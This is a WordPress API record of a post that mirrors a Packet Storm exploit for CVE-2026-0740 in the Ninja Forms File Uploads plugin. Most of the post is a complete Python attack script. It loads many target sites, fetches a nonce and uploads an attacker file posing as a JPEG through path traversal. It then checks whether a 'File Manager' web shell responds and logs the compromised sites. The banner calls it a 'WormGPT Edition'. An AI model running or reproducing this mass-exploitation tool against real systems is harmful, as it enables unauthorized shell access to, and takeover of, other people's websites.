{"id":53457,"date":"2026-05-12T12:49:14","date_gmt":"2026-05-12T12:49:14","guid":{"rendered":"https:\/\/zero.redgem.net\/?p=53457"},"modified":"2026-05-12T12:49:14","modified_gmt":"2026-05-12T12:49:14","slug":"wordpress-ninja-forms-file-uploads-3326-shell-upload-traversal","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=53457","title":{"rendered":"\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896"},"content":{"rendered":"

{“lastseen”:”2026-05-12T17:00:16″,”description”:”WordPress Ninja Forms – File Uploads plugin versions 3.3.26 and below arbitrary file upload exploit…”,”published”:”2026-05-12T00:00:00″,”modified”:”2026-05-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \/ Traversal”,”source”:””,”references”:””,”id”:”PACKETSTORM:220896″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2026-0740″],”sourceData”:”#!\/usr\/bin\/env python3\\n \\”\\”\\”\\n Ninja Forms Upload – CVE-2026-0740\\n Author : Xenon1337\\n \\”\\”\\”\\n \\n from __future__ import annotations\\n \\n import pathlib\\n import random\\n import sys\\n import re\\n from datetime import datetime\\n from functools import partialmethod\\n from urllib.parse import urljoin\\n from concurrent.futures import ThreadPoolExecutor, as_completed\\n \\n import httpx\\n from bs4 import BeautifulSoup\\n \\n \\n # ————————————————————— Constants —\\n AGENT = (\\n \\”Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 \\”\\n \\”(KHTML, like Gecko) Chrome\/120.0.0.0 Safari\/537.36 Edg\/120.0.0.0\\”\\n )\\n TIMEOUT = 10\\n DEFAULT_THREADS = 10\\n \\n # ====================== CONFIGURASI PATH TRAVERSAL ======================\\n # GANTI DI SINI SESUAI KEBUTUHAN BOS (selalu pakai forward slash \/)\\n DEST_TRAVERSAL = \\”..\/..\/..\/..\/\\”\\n # =======================================================================\\n \\n \\n # ——————————————————————- Utils —\\n class Logger:\\n COLORS = {\\n \\”error\\”: 31,\\n \\”success\\”: 32,\\n \\”warning\\”: 33,\\n \\”info\\”: 34,\\n }\\n \\n def log(self, level: str, scope: str, message: str, progress=False):\\n color = self.COLORS[level]\\n date, time = datetime.now().strftime(\\”%Y-%m-%d %H:%M:%S\\”).split(\\” \\”)\\n end = \\”\\\\r\\” if progress else \\”\\\\n\\”\\n \\n sys.stderr.write(\\n \\”\\\\r\\\\033[{}m[{}] [{}] [{}] [{}]\\\\033[0m {}{}\\”.format(\\n color, date, time, level, scope, message, end\\n )\\n )\\n \\n warning = partialmethod(log, \\”warning\\”)\\n error = partialmethod(log, \\”error\\”)\\n success = partialmethod(log, \\”success\\”)\\n info = partialmethod(log, \\”info\\”)\\n \\n \\n def normalize_url(target: str) -\\u003e list[str]:\\n target = target.strip().rstrip(\\”\/\\”)\\n if re.match(r’^https?:\/\/’, target, re.IGNORECASE):\\n return [target]\\n return [f\\”https:\/\/{target}\\”, f\\”http:\/\/{target}\\”]\\n \\n \\n def load_targets(targets_file: str | None) -\\u003e list[str]:\\n if not targets_file:\\n return []\\n path = pathlib.Path(targets_file)\\n if not path.is_file():\\n return []\\n all_targets = set()\\n with open(path, \\”r\\”, encoding=\\”utf-8\\”) as f:\\n for line in f:\\n line = line.strip()\\n if line and not line.startswith(\\”#\\”):\\n all_targets.add(line)\\n return list(all_targets)\\n \\n \\n # —————————————————————– Exploit —\\n def validate_uploaded_file(file_url: str, headers: dict, timeout: float, logger: Logger) -\\u003e bool:\\n try:\\n with httpx.Client(\\n follow_redirects=False,\\n headers=headers,\\n verify=False,\\n timeout=timeout\\n ) as http_client:\\n response = http_client.get(file_url)\\n \\n if response.status_code != 200:\\n logger.warning(\\”validation\\”, \\”Status bukan 200 di {} \u2192 {}\\”.format(file_url, response.status_code))\\n return False\\n \\n if \\”File Manager\\” in response.text or \\”\\u003ctitle\\u003eFile Manager\\u003c\/title\\u003e\\” in response.text:\\n logger.success(\\”validation\\”, \\”\u2588 FILE MANAGER DETECTED \u2588 {}\\”.format(file_url))\\n return True\\n else:\\n logger.warning(\\”validation\\”, \\”Marker File Manager TIDAK ditemukan di {}\\”.format(file_url))\\n return False\\n except Exception as e:\\n logger.error(\\”validation\\”, \\”Error saat validasi {}: {}\\”.format(file_url, e))\\n return False\\n \\n \\n def single_exploit(target: str, file_path: pathlib.Path, logger: Logger, headers: dict, timeout: float) -\\u003e tuple[bool, str]:\\n ajax_url = urljoin(target, \\”\/wp-admin\/admin-ajax.php\\”)\\n field_id = \\”\\”.join(random.choices(\\”123456789\\”, k=16))\\n \\n try:\\n with httpx.Client(\\n follow_redirects=False,\\n headers=headers,\\n verify=False,\\n timeout=timeout\\n ) as http_client:\\n # Step 1: Dapatkan nonce\\n data = {\\”action\\”: \\”nf_fu_get_new_nonce\\”, \\”field_id\\”: field_id}\\n response = http_client.post(ajax_url, data=data)\\n \\n if response.text == \\”0\\”:\\n return False, \\”\\”\\n \\n json_result = response.json()\\n if not json_result.get(\\”success\\”):\\n return False, \\”\\”\\n \\n nonce = json_result[\\”data\\”][\\”nonce\\”]\\n \\n # Step 2: Upload dengan path traversal (FORWARD SLASH SELALU)\\n files_key = \\”files-{}\\”.format(field_id)\\n dest_path_str = \\”{}{}\\”.format(DEST_TRAVERSAL, file_path.name)\\n \\n files = {files_key: (\\”image.jpg\\”, file_path.read_bytes(), \\”image\/jpeg\\”)}\\n data = {\\n \\”action\\”: \\”nf_fu_upload\\”,\\n \\”nonce\\”: nonce,\\n \\”form_id\\”: field_id,\\n \\”field_id\\”: field_id,\\n \\”image_jpg\\”: dest_path_str\\n }\\n \\n response = http_client.post(ajax_url, data=data, files=files)\\n json_result = response.json()\\n \\n if json_result.get(\\”data\\”) and json_result[\\”data\\”].get(\\”files\\”):\\n uploaded_tmp_name = json_result[\\”data\\”][\\”files\\”][0][\\”tmp_name\\”]\\n if uploaded_tmp_name == dest_path_str:\\n file_url = urljoin(target, \\”\/wp-content\/uploads\/ninja-forms\/tmp\/{}\\”.format(dest_path_str))\\n \\n if validate_uploaded_file(file_url, headers, timeout, logger):\\n return True, file_url\\n except Exception as e:\\n logger.error(\\”exploit\\”, \\”Error pada {}: {}\\”.format(target, e))\\n \\n return False, \\”\\”\\n \\n \\n def exploit_worker(target: str, file_path: pathlib.Path, logger: Logger, headers: dict, timeout: float):\\n protocols = normalize_url(target)\\n for proto_target in protocols:\\n logger.info(\\”exploit\\”, \\”[THREAD] Menyerang {} …\\”.format(proto_target))\\n success, file_url = single_exploit(proto_target, file_path, logger, headers, timeout)\\n if success:\\n logger.success(\\”exploit\\”, \\”BERHASIL + VALIDASI FILE MANAGER LOLOS! \u2192 {}\\”.format(file_url))\\n return proto_target, file_url\\n else:\\n logger.warning(\\”exploit\\”, \\”Gagal di {}, mencoba protokol berikutnya…\\”.format(proto_target))\\n return None, None\\n \\n \\n # ——————————————————————– Main —\\n def main():\\n logger = Logger()\\n \\n print(\\”\\\\n\\” + \\”\u2550\\” * 90)\\n print(\\”Ninja Forms Upload – CVE-2026-0740 [WormGPT Edition – PROXY DIHAPUS]\\”)\\n print(\\”\u2550\\” * 90)\\n \\n print(\\”\\\\n[1] Input your list of targets (file atau manual URL)\\”)\\n targets_input = input(\\”Input your list : \\”).strip()\\n \\n targets = []\\n if targets_input:\\n path = pathlib.Path(targets_input)\\n if path.is_file():\\n targets = load_targets(targets_input)\\n logger.success(\\”target_loading\\”, \\”Loaded {} targets dari file\\”.format(len(targets)))\\n else:\\n targets = [t.strip() for t in re.split(r'[,;\\\\s]+’, targets_input) if t.strip()]\\n logger.success(\\”target_loading\\”, \\”Loaded {} targets dari input manual\\”.format(len(targets)))\\n \\n if not targets:\\n logger.error(\\”target_loading\\”, \\”Tidak ada target yang diberikan!\\”)\\n return 1\\n \\n print(\\”\\\\n[2] Input your payload file\\”)\\n while True:\\n file_input = input(\\”Input your file : \\”).strip()\\n file_path = pathlib.Path(file_input)\\n if file_path.is_file():\\n break\\n else:\\n logger.error(\\”file_loading\\”, \\”File tidak ditemukan: {}\\”.format(file_path))\\n \\n headers = {\\”User-Agent\\”: AGENT}\\n \\n logger.success(\\”main\\”, \\”Total target: {} | Threads: {} | Traversal: {}\\”.format(len(targets), DEFAULT_THREADS, DEST_TRAVERSAL))\\n \\n success_results = []\\n with ThreadPoolExecutor(max_workers=DEFAULT_THREADS) as executor:\\n future_to_target = {\\n executor.submit(exploit_worker, target, file_path, logger, headers, TIMEOUT): target\\n for target in targets\\n }\\n \\n for future in as_completed(future_to_target):\\n target = future_to_target[future]\\n try:\\n success_target, file_url = future.result()\\n if success_target and file_url:\\n success_results.append(\\”{} =\\u003e {}\\”.format(success_target, file_url))\\n with open(\\”vuln_ninja.txt\\”, \\”a\\”, encoding=\\”utf-8\\”) as f:\\n f.write(\\”{}\\\\n\\”.format(file_url))\\n except Exception as e:\\n logger.error(\\”thread\\”, \\”Thread error pada {}: {}\\”.format(target, e))\\n \\n if success_results:\\n logger.success(\\”main\\”, \\”Hasil disimpan di vuln_ninja.txt\\”)\\n for res in success_results:\\n logger.success(\\”main\\”, res)\\n else:\\n logger.error(\\”main\\”, \\”TIDAK ADA TARGET YANG BERHASIL + VALID.\\”)\\n \\n return 0 if success_results else 1\\n \\n \\n if __name__ == \\”__main__\\”:\\n sys.exit(main())”,”sourceHref”:”https:\/\/packetstorm.news\/download\/220896″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/220896\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2026-05-12T17:00:16″,”description”:”WordPress Ninja Forms – File Uploads plugin versions 3.3.26 and below arbitrary file upload exploit…”,”published”:”2026-05-12T00:00:00″,”modified”:”2026-05-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \/…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-53457","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 WordPress Ninja Forms - File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=53457\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 WordPress Ninja Forms - File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2026-05-12T17:00:16″,”description”:”WordPress Ninja Forms – File Uploads plugin versions 3.3.26 and below arbitrary file upload exploit…”,”published”:”2026-05-12T00:00:00″,”modified”:”2026-05-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \/...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=53457\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2026-05-12T12:49:14+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"7 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53457#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53457\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \\\/ Traversal_PACKETSTORM:220896\",\"datePublished\":\"2026-05-12T12:49:14+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53457\"},\"wordCount\":1359,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53457#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53457\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53457\",\"name\":\"\ud83d\udcc4 WordPress Ninja Forms - File Uploads 3.3.26 Shell Upload \\\/ Traversal_PACKETSTORM:220896 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2026-05-12T12:49:14+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53457#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=53457\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=53457#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \\\/ Traversal_PACKETSTORM:220896\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 WordPress Ninja Forms - File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=53457","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 WordPress Ninja Forms - File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896 - zero redgem","og_description":"{“lastseen”:”2026-05-12T17:00:16″,”description”:”WordPress Ninja Forms – File Uploads plugin versions 3.3.26 and below arbitrary file upload exploit…”,”published”:”2026-05-12T00:00:00″,”modified”:”2026-05-12T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \/...","og_url":"https:\/\/zero.redgem.net\/?p=53457","og_site_name":"zero redgem","article_published_time":"2026-05-12T12:49:14+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"7 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=53457#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=53457"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896","datePublished":"2026-05-12T12:49:14+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=53457"},"wordCount":1359,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=53457#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=53457","url":"https:\/\/zero.redgem.net\/?p=53457","name":"\ud83d\udcc4 WordPress Ninja Forms - File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2026-05-12T12:49:14+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=53457#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=53457"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=53457#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 WordPress Ninja Forms – File Uploads 3.3.26 Shell Upload \/ Traversal_PACKETSTORM:220896"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53457","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=53457"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/53457\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=53457"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=53457"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=53457"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}